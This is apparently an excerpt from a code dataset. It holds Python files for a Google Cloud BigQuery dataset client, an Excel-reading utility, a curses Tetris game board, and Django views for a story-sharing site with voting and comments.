'datasetReference': {\n 'projectId': self.project, 'datasetId': self.name},\n }\n if self.default_table_expiration_ms is not None:\n value = self.default_table_expiration_ms\n resource['defaultTableExpirationMs'] = value\n\n if self.description is not None:\n resource['description'] = self.description\n\n if self.friendly_name is not None:\n resource['friendlyName'] = self.friendly_name\n\n if self.location is not None:\n resource['location'] = self.location\n\n if len(self.access_grants) > 0:\n resource['access'] = self._build_access_resource()\n\n return resource\n\n def create(self, client=None):\n \"\"\"API call: create the dataset via a PUT request\n\n See:\n https://cloud.google.com/bigquery/reference/rest/v2/tables/insert\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n path = '/projects/%s/datasets' % (self.project,)\n api_response = client.connection.api_request(\n method='POST', path=path, data=self._build_resource())\n self._set_properties(api_response)\n\n def exists(self, client=None):\n \"\"\"API call: test for the existence of the dataset via a GET request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/get\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n\n try:\n client.connection.api_request(method='GET', path=self.path,\n query_params={'fields': 'id'})\n except NotFound:\n return False\n else:\n return True\n\n def reload(self, client=None):\n \"\"\"API call: refresh dataset properties via a GET request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/get\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. 
If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n\n api_response = client.connection.api_request(\n method='GET', path=self.path)\n self._set_properties(api_response)\n\n def patch(self, client=None, **kw):\n \"\"\"API call: update individual dataset properties via a PATCH request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/patch\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n\n :type kw: ``dict``\n :param kw: properties to be patched.\n\n :raises: ValueError for invalid value types.\n \"\"\"\n client = self._require_client(client)\n\n partial = {}\n\n if 'default_table_expiration_ms' in kw:\n value = kw['default_table_expiration_ms']\n if not isinstance(value, six.integer_types) and value is not None:\n raise ValueError(\"Pass an integer, or None\")\n partial['defaultTableExpirationMs'] = value\n\n if 'description' in kw:\n partial['description'] = kw['description']\n\n if 'friendly_name' in kw:\n partial['friendlyName'] = kw['friendly_name']\n\n if 'location' in kw:\n partial['location'] = kw['location']\n\n api_response = client.connection.api_request(\n method='PATCH', path=self.path, data=partial)\n self._set_properties(api_response)\n\n def update(self, client=None):\n \"\"\"API call: update dataset properties via a PUT request\n\n See\n https://cloud.google.com/bigquery/docs/reference/v2/datasets/update\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n api_response = client.connection.api_request(\n method='PUT', path=self.path, data=self._build_resource())\n self._set_properties(api_response)\n\n def delete(self, client=None):\n \"\"\"API call: delete the dataset via a DELETE request\n\n See:\n https://cloud.google.com/bigquery/reference/rest/v2/datasets/delete\n\n :type client: :class:`gcloud.bigquery.client.Client` or ``NoneType``\n :param client: the client to use. If not passed, falls back to the\n ``client`` stored on the current dataset.\n \"\"\"\n client = self._require_client(client)\n client.connection.api_request(method='DELETE', path=self.path)\n\n def list_tables(self, max_results=None, page_token=None):\n \"\"\"List tables for the project associated with this client.\n\n See:\n https://cloud.google.com/bigquery/docs/reference/v2/tables/list\n\n :type max_results: int\n :param max_results: maximum number of tables to return, If not\n passed, defaults to a value set by the API.\n\n :type page_token: string\n :param page_token: opaque marker for the next \"page\" of datasets. 
If\n not passed, the API will return the first page of\n datasets.\n\n :rtype: tuple, (list, str)\n :returns: list of :class:`gcloud.bigquery.table.Table`, plus a\n \"next page token\" string: if not None, indicates that\n more tables can be retrieved with another call (pass that\n value as ``page_token``).\n \"\"\"\n params = {}\n\n if max_results is not None:\n params['maxResults'] = max_results\n\n if page_token is not None:\n params['pageToken'] = page_token\n\n path = '/projects/%s/datasets/%s/tables' % (self.project, self.name)\n connection = self._client.connection\n resp = connection.api_request(method='GET', path=path,\n query_params=params)\n tables = [Table.from_api_repr(resource, self)\n for resource in resp['tables']]\n return tables, resp.get('nextPageToken')\n\n def table(self, name, schema=()):\n \"\"\"Construct a table bound to this dataset.\n\n :type name: string\n :param name: Name of the table.\n\n :type schema: list of :class:`gcloud.bigquery.table.SchemaField`\n :param schema: The table's schema\n\n :rtype: :class:`gcloud.bigquery.table.Table`\n :returns: a new ``Table`` instance\n \"\"\"\n return Table(name, dataset=self, schema=schema)\n", "sub_path": "src/lib/gcloud/bigquery/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 18657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "gcloud._helpers._datetime_from_microseconds", "line_number": 120, "usage_type": "call"}, {"api_name": "gcloud._helpers._datetime_from_microseconds", "line_number": 150, "usage_type": "call"}, {"api_name": "six.integer_types", "line_number": 179, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 201, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 223, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 245, "usage_type": "attribute"}, {"api_name": "gcloud.exceptions.NotFound", "line_number": 386, "usage_type": "name"}, {"api_name": "six.integer_types", "line_number": 428, "usage_type": "attribute"}, {"api_name": "gcloud.bigquery.table.Table.from_api_repr", "line_number": 506, "usage_type": "call"}, {"api_name": "gcloud.bigquery.table.Table", "line_number": 506, "usage_type": "name"}, {"api_name": "gcloud.bigquery.table.Table", "line_number": 522, "usage_type": "call"}]} +{"seq_id": "317436997", "text": "# -*- coding: utf-8 -*- \n\n__author__ = \"Mr-Li\"\n__date__ = \"2019/1/10 22:05\"\n\nimport xlrd\nimport json\nimport os\nimport datetime\n\n\nclass ExcelUtil(object):\n\n def __init__(self, excel_file, sheet_index=0):\n \"\"\"\n 初始化excel对象,并创建sheet实例属性\n :param excel_file: excel文件的位置\n :param sheet_index: sheet的索引,默认为0\n \"\"\"\n self.file = os.path.abspath(excel_file)\n _work_book = xlrd.open_workbook(self.file)\n self.sheet = _work_book.sheet_by_index(sheet_index)\n self._data_set = []\n\n def __repr__(self):\n \"\"\"\n 返回自定义excel的信息,供debug显示\n :return: excel_info\n \"\"\"\n date = datetime.datetime.fromtimestamp(os.path.getmtime(self.file))\n modify_time = date.strftime('%Y-%m-%d %H:%M:%S')\n key_title = \",\".join(self.sheet.row_values(0, end_colx=self.n_col-1))\n info = {\n \"sheet_index\": self.sheet.number,\n \"sheet_name\": self.sheet.name,\n \"row_number\": self.n_row,\n \"col_number\": self.n_col,\n \"key_str\": key_title,\n \"excel_file\": self.file,\n \"last_modify_time\": modify_time\n }\n return json.dumps(info)\n\n def __getitem__(self, item):\n \"\"\"\n 设置成可迭代的对象,直接对excel里面的数据迭代获取,异常后停止输出\n 
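To make the ``list_tables`` pagination contract above concrete, here is a minimal draining loop. This is a sketch under assumptions: the project id and dataset name are invented, and it presumes a client wired with valid credentials.

from gcloud import bigquery

client = bigquery.Client(project='my-project')  # invented project id
dataset = client.dataset('my_dataset')          # invented dataset name

tables, token = dataset.list_tables(max_results=50)
while token is not None:
    # Feed the opaque token back in to fetch the next page.
    more, token = dataset.list_tables(max_results=50, page_token=token)
    tables.extend(more)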
:param item: row_number\n :return: row_values\n \"\"\"\n return self.sheet.row_values(item+1)\n\n @property\n def n_row(self):\n \"\"\"\n 属性方法,获取表格的行数\n :return:\n \"\"\"\n return self.sheet.nrows\n\n @property\n def n_col(self):\n \"\"\"\n 属性方法,获取表格的列数\n :return:\n \"\"\"\n return self.sheet.ncols\n\n def cell_value(self, n_row, n_col):\n \"\"\"\n 获取单元格的值\n :param n_row: 行号\n :param n_col: 列号\n :return: string\n \"\"\"\n return self.sheet.cell_value(n_row, n_col)\n\n def iterator_data(self, start_number=1):\n \"\"\"\n 迭代器形式填充数据,适合数据比较大的excel文件, 默认去除标题\n :return:\n \"\"\"\n for row_number in range(start_number, self.n_row):\n yield self.sheet.row_values(row_number)\n\n def all_data(self, start_number=1):\n \"\"\"\n 获取excel的所有数据,并返回一个list, 默认去除标题\n :return:\n \"\"\"\n for row_number in range(start_number, self.n_row):\n self._data_set.append(self.sheet.row_values(row_number))\n return self._data_set\n\n\nif __name__ == '__main__':\n excel = ExcelUtil(\"demo.xls\")\n print(excel.n_row, excel.n_col)\n print(excel.all_data())\n print(excel)\n\n", "sub_path": "test_data_for_excel.py", "file_name": "test_data_for_excel.py", "file_ext": "py", "file_size_in_byte": 2816, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "xlrd.open_workbook", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "445244198", "text": "import copy\nimport curses\nimport math\n\nfrom pieces import Shape\n\n\nclass Board(object):\n '''Maintains the entire state of the game.'''\n\n def __init__(self, columns=None, rows=None, level=None):\n self.num_rows = rows\n self.num_columns = columns\n self.array = [[None for _ in range(self.num_columns)] for _ in range(self.num_rows)]\n self.falling_shape = None\n self.next_shape = None\n self.score = 0\n self.level = level or 1\n self.preview_column = 12\n self.preview_row = 1\n self.starting_column = 4\n self.starting_row = 0\n self.drawer = BoardDrawer(self)\n self.points_per_line = 20\n self.points_per_level = 200\n\n def start_game(self):\n self.score = 0\n self.level = 1\n if self.next_shape is None:\n self.next_shape = Shape.random(self.preview_column, self.preview_row)\n self.new_shape()\n\n def end_game(self):\n raise GameOverError(score=self.score, level=self.level)\n\n def new_shape(self):\n self.falling_shape = self.next_shape\n self.falling_shape.move_to(self.starting_column, self.starting_row)\n self.next_shape = Shape.random(self.preview_column, self.preview_row)\n if self.shape_cannot_be_placed(self.falling_shape):\n self.next_shape = self.falling_shape\n self.falling_shape = None\n self.next_shape.move_to(self.preview_column, self.preview_row)\n self.end_game()\n\n def remove_completed_lines(self):\n rows_removed = []\n lowest_row_removed = 0\n for row in self.array:\n if all(row):\n lowest_row_removed = max(lowest_row_removed, row[0].row_position)\n rows_removed.append(copy.deepcopy(row))\n for block in row:\n self.array[block.row_position][block.column_position] = 
None\n if len(rows_removed) > 0:\n points_earned = math.pow(2, len(rows_removed) - 1) * self.points_per_line\n self.score += points_earned\n if self.score > self.points_per_level * self.level:\n self.level += 1\n\n for column_index in range(0, self.num_columns):\n for row_index in range(lowest_row_removed, 0, -1):\n block = self.array[row_index][column_index]\n if block:\n # Number of rows removed that were below this one\n distance_to_drop = len(\n [row for row in rows_removed if\n row[0].row_position > block.row_position]\n )\n new_row_index = row_index + distance_to_drop\n self.array[row_index][column_index] = None\n self.array[new_row_index][column_index] = block\n block.row_position = new_row_index\n\n def settle_falling_shape(self):\n '''Resolves the current falling shape.'''\n\n if self.falling_shape:\n self._settle_shape(self.falling_shape)\n self.falling_shape = None\n self.new_shape()\n\n def _settle_shape(self, shape):\n '''Adds shape to settled pieces array.'''\n\n if shape:\n for block in shape.blocks:\n self.array[block.row_position][block.column_position] = block\n self.remove_completed_lines()\n\n def move_shape_left(self):\n if self.falling_shape:\n self.falling_shape.shift_shape_left_by_one_column()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.shift_shape_right_by_one_column()\n return False\n return True\n\n def move_shape_right(self):\n if self.falling_shape:\n self.falling_shape.shift_shape_right_by_one_column()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.shift_shape_left_by_one_column()\n return False\n return True\n\n def rotate_shape(self):\n if self.falling_shape:\n self.falling_shape.rotate_clockwise()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.rotate_counterclockwise()\n return False\n return True\n\n def let_shape_fall(self):\n '''What happens during every `tick`. 
Also what happens when the user hits down arrow.'''\n\n if self.falling_shape:\n self.falling_shape.lower_shape_by_one_row()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.raise_shape_by_one_row()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.end_game()\n else:\n self.settle_falling_shape()\n return True\n\n def drop_shape(self):\n '''When you hit the enter arrow and the piece goes all the way down.'''\n\n if self.falling_shape:\n while not self.shape_cannot_be_placed(self.falling_shape):\n self.falling_shape.lower_shape_by_one_row()\n self.falling_shape.raise_shape_by_one_row()\n if self.shape_cannot_be_placed(self.falling_shape):\n self.end_game()\n else:\n self.settle_falling_shape()\n return True\n\n def shape_cannot_be_placed(self, shape):\n '''Determines whether a shape can successfully be placed.'''\n\n for block in shape.blocks:\n if (block.column_position < 0 or\n block.column_position >= self.num_columns or\n block.row_position < 0 or\n block.row_position >= self.num_rows or\n self.array[block.row_position][block.column_position] is not None):\n return True\n return False\n\n\nclass BoardDrawer(object):\n '''Manages drawing the board.'''\n\n def __init__(self, board):\n stdscr = curses.initscr()\n stdscr.nodelay(1)\n curses.start_color()\n curses.init_pair(1, curses.COLOR_RED, curses.COLOR_RED)\n curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_BLUE)\n curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_GREEN)\n curses.init_pair(4, curses.COLOR_MAGENTA, curses.COLOR_MAGENTA)\n curses.init_pair(5, curses.COLOR_CYAN, curses.COLOR_CYAN)\n curses.init_pair(6, curses.COLOR_YELLOW, curses.COLOR_YELLOW)\n curses.init_pair(7, curses.COLOR_WHITE, curses.COLOR_BLACK)\n curses.init_pair(8, curses.COLOR_BLACK, curses.COLOR_WHITE)\n curses.init_pair(10, 10, 10)\n curses.cbreak()\n stdscr.keypad(1)\n curses.nonl()\n curses.curs_set(0)\n curses.noecho()\n self.stdscr = stdscr\n self.preview_column = board.preview_column\n self.preview_row = board.preview_row\n self.num_rows = board.num_rows\n self.num_columns = board.num_columns\n self.block_width = 2\n self.border_width = 1\n\n def update_falling_piece(self, board):\n '''Adds the currently falling pieces to the next stdscr to be drawn.'''\n\n if board.falling_shape:\n for block in board.falling_shape.blocks:\n self.stdscr.addstr(\n block.row_position + self.border_width,\n self.block_width * block.column_position + self.border_width,\n ' ' * self.block_width,\n curses.color_pair(block.color)\n )\n\n def update_settled_pieces(self, board):\n '''Adds the already settled pieces to the next stdscr to be drawn.'''\n\n for (r_index, row) in enumerate(board.array):\n for (c_index, value) in enumerate(row):\n block = value\n if block:\n color_pair = block.color\n else:\n color_pair = 0\n self.stdscr.addstr(\n r_index + self.border_width,\n c_index * self.block_width + self.border_width,\n ' ' * self.block_width,\n curses.color_pair(color_pair)\n )\n\n def update_shadow(self, board):\n '''Adds the 'shadow' of the falling piece to the next stdscr to be drawn.'''\n\n # Projects a shadow of where the piece will land.\n shadow = copy.deepcopy(board.falling_shape)\n if shadow:\n while not board.shape_cannot_be_placed(shadow):\n shadow.lower_shape_by_one_row()\n shadow.raise_shape_by_one_row()\n for block in shadow.blocks:\n self.stdscr.addstr(\n block.row_position + self.border_width,\n self.block_width * block.column_position + self.border_width,\n ' ' * self.block_width,\n curses.color_pair(8))\n\n def 
update_next_piece(self, board):\n '''Adds the next piece to the next stdscr to be drawn.'''\n\n if board.next_shape:\n for preview_row_offset in range(4):\n self.stdscr.addstr(\n self.preview_row + preview_row_offset + self.border_width,\n (self.preview_column - 1) * self.block_width + self.border_width * 2,\n ' ' * self.block_width,\n curses.color_pair(0)\n )\n for block in board.next_shape.blocks:\n self.stdscr.addstr(\n block.row_position + self.border_width,\n block.column_position * self.block_width + self.border_width * 2,\n ' ' * self.block_width,\n curses.color_pair(block.color)\n )\n\n def update_score_and_level(self, board):\n '''Adds the score and level to the next stdscr to be drawn.'''\n\n # Level\n self.stdscr.addstr(\n 5 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'LEVEL: %d' % board.level,\n curses.color_pair(7)\n )\n # Score\n self.stdscr.addstr(\n 6 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'SCORE: %d' % board.score,\n curses.color_pair(7)\n )\n\n def clear_score(self):\n '''Does what it says on the tin.'''\n\n # Level\n self.stdscr.addstr(\n 5 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'LEVEL: ',\n curses.color_pair(7)\n )\n # Score\n self.stdscr.addstr(\n 6 + self.border_width,\n self.preview_column * self.block_width - 2 + self.border_width,\n 'SCORE: ',\n curses.color_pair(7)\n )\n\n def update_border(self):\n '''Adds the border to the next stdscr to be drawn.'''\n\n # Side borders\n for row_position in range(self.num_rows + self.border_width * 2):\n self.stdscr.addstr(row_position, 0, '|', curses.color_pair(7))\n self.stdscr.addstr(row_position, self.num_columns * self.block_width + 1, '|', curses.color_pair(7))\n # Top and bottom borders\n for column_position in range(self.num_columns * self.block_width + self.border_width * 2):\n self.stdscr.addstr(0, column_position, '-', curses.color_pair(7))\n self.stdscr.addstr(self.num_rows + 1, column_position, '-', curses.color_pair(7))\n\n def update(self, board):\n '''Updates all visual board elements and then refreshes the screen.'''\n\n self.update_border()\n self.update_score_and_level(board)\n self.update_next_piece(board)\n self.update_settled_pieces(board)\n self.update_falling_piece(board)\n self.update_shadow(board)\n self.refresh_screen()\n\n def refresh_screen(self):\n stdscr = self.stdscr\n stdscr.refresh()\n\n\nclass GameOverError(Exception):\n def __init__(self, score, level):\n super(GameOverError).__init__(GameOverError)\n self.score = score\n self.level = level", "sub_path": "board.py", "file_name": "board.py", "file_ext": "py", "file_size_in_byte": 12190, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pieces.Shape.random", "line_number": 31, "usage_type": "call"}, {"api_name": "pieces.Shape", "line_number": 31, "usage_type": "name"}, {"api_name": "pieces.Shape.random", "line_number": 40, "usage_type": "call"}, {"api_name": "pieces.Shape", "line_number": 40, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 53, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 57, "usage_type": "call"}, {"api_name": "curses.initscr", "line_number": 159, "usage_type": "call"}, {"api_name": "curses.start_color", "line_number": 161, "usage_type": "call"}, {"api_name": "curses.init_pair", "line_number": 162, "usage_type": "call"}, {"api_name": "curses.COLOR_RED", "line_number": 162, 
"usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 163, "usage_type": "call"}, {"api_name": "curses.COLOR_BLUE", "line_number": 163, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 164, "usage_type": "call"}, {"api_name": "curses.COLOR_GREEN", "line_number": 164, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 165, "usage_type": "call"}, {"api_name": "curses.COLOR_MAGENTA", "line_number": 165, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 166, "usage_type": "call"}, {"api_name": "curses.COLOR_CYAN", "line_number": 166, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 167, "usage_type": "call"}, {"api_name": "curses.COLOR_YELLOW", "line_number": 167, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 168, "usage_type": "call"}, {"api_name": "curses.COLOR_WHITE", "line_number": 168, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 168, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 169, "usage_type": "call"}, {"api_name": "curses.COLOR_BLACK", "line_number": 169, "usage_type": "attribute"}, {"api_name": "curses.COLOR_WHITE", "line_number": 169, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 170, "usage_type": "call"}, {"api_name": "curses.cbreak", "line_number": 171, "usage_type": "call"}, {"api_name": "curses.nonl", "line_number": 173, "usage_type": "call"}, {"api_name": "curses.curs_set", "line_number": 174, "usage_type": "call"}, {"api_name": "curses.noecho", "line_number": 175, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 193, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 210, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 217, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 227, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 238, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 245, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 256, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 263, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 274, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 281, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 289, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 290, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 293, "usage_type": "call"}, {"api_name": "curses.color_pair", "line_number": 294, "usage_type": "call"}]} +{"seq_id": "59716455", "text": "# standard library imports\nimport re # praw\nfrom xml.etree.ElementTree import Element, SubElement, tostring # for rss\nimport json # for temporary story api. 
Replace with REST.\nimport feedparser\n\n# core django components\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.urlresolvers import * # for rss\n# for 404\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n# date\nfrom datetime import datetime\nfrom time import mktime\n\n# My own stuff\n# utility functions\nfrom comments.utils import get_comment_list\nfrom .utils import rank_hot, rank_top\n# Forms\nfrom .forms import StoryForm, ChapterForm\nfrom comments.forms import CommentForm\nfrom hubs.forms import HubForm\n# Models\nfrom .models import Story, Chapter\nfrom profiles.models import User\nfrom hubs.models import Hub\nfrom comments.models import Comment\n\n\ndef stories(request, rankby=\"hot\", timespan=\"all-time\",\n filterby=\"\", hubslug=\"\", username=\"\"):\n # for user profile navbar\n userprofile = []\n if not request.user.is_anonymous():\n subscribed_to = request.user.subscribed_to.all()\n else:\n subscribed_to = []\n \n if filterby == \"subscriptions\":\n subscribed_to = request.user.subscribed_to.all()\n stories = Story.objects.filter(author__in=subscribed_to, published=True)\n filterurl=\"/subscriptions\" # to add to href in subnav\n elif filterby == \"hub\":\n hub = Hub.objects.get(slug=hubslug)\n # Show stories from all the children hubs? Don't know how to sort.\n # children = Hub.objects.filter(parent=hub)\n # hubs = []\n stories = Story.objects.filter(hubs=hub, published=True)\n filterurl=\"/hub/\"+hubslug # to add to href in subnav\n elif filterby == \"user\":\n userprofile = get_object_or_404(User, username=username)\n if request.user == userprofile:\n # If it's my profile - display all the stories, even unpublished.\n stories = Story.objects.filter(author=userprofile)\n else:\n stories = Story.objects.filter(author=userprofile, published=True)\n filterurl=\"/user/\"+username # to add to href in subnav\n else:\n stories = Story.objects.filter(published=True)\n filterurl=\"\" # to add to href in subnav \n\n if rankby == \"hot\":\n story_list = rank_hot(stories, top=32)\n elif rankby == \"top\":\n story_list = rank_top(stories, timespan = timespan)\n elif rankby == \"new\":\n story_list = stories.order_by('-pub_date')\n else:\n story_list = []\n\n\n # Pagination\n paginator = Paginator(story_list, 25)\n page = request.GET.get('page')\n try:\n stories = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n stories = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g.
9999), deliver last page of results.\n stories = paginator.page(paginator.num_pages) \n\n # Disable upvoted/downvoted\n if request.user.is_authenticated():\n upvoted = request.user.upvoted.all()\n downvoted = request.user.downvoted.all() \n else:\n upvoted = []\n downvoted = [] \n\n \n # if not stories:\n # return HttpResponseRedirect('/404')\n\n hubs = Hub.objects.all().order_by('id')\n\n return render(request, 'stories/stories.html',{\n 'stories':stories,\n 'upvoted': upvoted,\n 'downvoted': downvoted,\n 'filterby':filterby,\n 'filterurl': filterurl, \n 'rankby': rankby,\n 'timespan': timespan,\n 'userprofile':userprofile,\n 'subscribed_to': subscribed_to,\n 'hubs': hubs\n })\n\n# Voting\ndef upvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n story.score += 1\n story.save()\n story.author.karma += 1\n story.author.save()\n user = request.user\n user.upvoted.add(story)\n user.save()\n return HttpResponse()\n\ndef downvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n if story.score > 0:\n story.score -= 1\n story.author.karma -= 1 \n story.save()\n story.author.save()\n user = request.user\n user.downvoted.add(story)\n user.save()\n return HttpResponse()\n\ndef unupvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n story.score -= 1\n story.save()\n story.author.karma -= 1\n story.author.save()\n user = request.user\n user.upvoted.remove(story)\n user.save()\n return HttpResponse()\n\ndef undownvote(request):\n story = get_object_or_404(Story, id=request.POST.get('post-id'))\n story.score += 1\n story.author.karma += 1 \n story.save()\n story.author.save()\n user = request.user\n user.downvoted.remove(story)\n user.save()\n return HttpResponse()\n \ndef story(request, story, comment_id=\"\", chapter=\"\", rankby=\"new\", filterby=\"\"):\n try:\n story = Story.objects.get(slug=story)\n except:\n return HttpResponseRedirect('/404')\n \n\n try:\n first_chapter = Chapter.objects.get(story=story, number=1)\n except:\n first_chapter = []\n \n\n # If chapter\n if chapter:\n chapter = Chapter.objects.get(slug=chapter)\n first_chapter = [] # empty first chapter to show the right button in story template\n try:\n prev_chapter = Chapter.objects.get(story=story, number=chapter.number-1)\n except:\n prev_chapter = []\n\n try:\n next_chapter = Chapter.objects.get(story=story, number=chapter.number+1)\n except:\n next_chapter = []\n else:\n chapter = []\n prev_chapter = []\n next_chapter = []\n \n \n hubs = story.hubs.all()\n \n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False) # return story but don't save it to db just yet\n comment.author = request.user\n comment.parent = None\n if chapter:\n comment.chapter = chapter \n else:\n comment.story = story\n comment.save()\n if comment.comment_type == 1:\n if chapter:\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'#comments')\n else:\n return HttpResponseRedirect('/story/'+story.slug+'#comments')\n else:\n if chapter:\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'/reviews#comments')\n else:\n return HttpResponseRedirect('/story/'+story.slug+'/reviews#comments')\n \n else:\n form = CommentForm()\n\n if request.user.is_authenticated():\n upvoted = request.user.upvoted.all()\n downvoted = request.user.downvoted.all() \n else:\n upvoted = []\n downvoted = [] \n\n # For subscribe button\n if not request.user.is_anonymous():\n subscribed_to = 
request.user.subscribed_to.all()\n else:\n subscribed_to = []\n\n\n # Get top lvl comments\n if filterby == \"reviews\":\n filterurl = \"reviews\"\n if chapter:\n top_lvl_comments = Comment.objects.filter(chapter = chapter,\n comment_type=2,\n parent = None)\n else:\n top_lvl_comments = Comment.objects.filter(story = story,\n comment_type=2,\n parent = None)\n else:\n if chapter:\n top_lvl_comments = Comment.objects.filter(chapter = chapter,\n comment_type=1,\n parent = None)\n else:\n top_lvl_comments = Comment.objects.filter(story = story,\n comment_type=1,\n parent = None)\n\n # Rank comments\n if rankby == \"hot\":\n ranked_comments = rank_hot(top_lvl_comments, top=32)\n elif rankby == \"top\":\n ranked_comments = rank_top(top_lvl_comments, timespan = \"all-time\")\n elif rankby == \"new\":\n ranked_comments = top_lvl_comments.order_by('-pub_date')\n else:\n ranked_comments = []\n\n # Permalink to one comment\n if comment_id:\n comment = []\n comment.append(Comment.objects.get(id = comment_id))\n ranked_comments = comment\n\n\n # Nested comments\n comments = list(get_comment_list(ranked_comments, rankby=rankby))\n\n if request.user.is_authenticated():\n comments_upvoted = request.user.comments_upvoted.all()\n comments_downvoted = request.user.comments_downvoted.all() \n else:\n comments_upvoted = []\n comments_downvoted = [] \n\n return render(request, 'stories/story.html',{\n 'story': story,\n 'first_chapter':first_chapter,\n 'chapter': chapter,\n 'prev_chapter': prev_chapter,\n 'next_chapter': next_chapter, \n 'upvoted': upvoted,\n 'downvoted': downvoted,\n 'comments_upvoted': comments_upvoted,\n 'comments_downvoted': comments_downvoted,\n 'comments': comments,\n 'rankby': rankby, \n 'form': form,\n 'hubs':hubs,\n 'subscribed_to':subscribed_to,\n 'filterby':filterby\n })\n\ndef chapter_back(request, story, chapter):\n story = Story.objects.get(slug=story)\n chapter = Chapter.objects.get(slug=chapter) \n comments = Comment.objects.filter(chapter = chapter) \n\n try:\n prev_chapter = Chapter.objects.get(story=story, number=chapter.number-1)\n except:\n prev_chapter = []\n\n try:\n next_chapter = Chapter.objects.get(story=story, number=chapter.number+1)\n except:\n next_chapter = []\n\n hubs = story.hubs.all()\n \n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False) # return story but don't save it to db just yet\n comment.author = request.user\n comment.parent = None\n # comment.story = story\n comment.chapter = chapter \n comment.save()\n return HttpResponseRedirect('/story/'+story.slug+'/'+chapter.slug+'#comments')\n else:\n form = CommentForm()\n\n if request.user.is_authenticated():\n upvoted = request.user.upvoted.all()\n downvoted = request.user.downvoted.all() \n else:\n upvoted = []\n downvoted = [] \n \n return render(request, 'stories/chapter.html',{\n 'story': story,\n 'chapter': chapter,\n 'prev_chapter': prev_chapter,\n 'next_chapter': next_chapter, \n 'upvoted': upvoted,\n 'downvoted': downvoted, \n 'comments': comments, \n 'form': form,\n 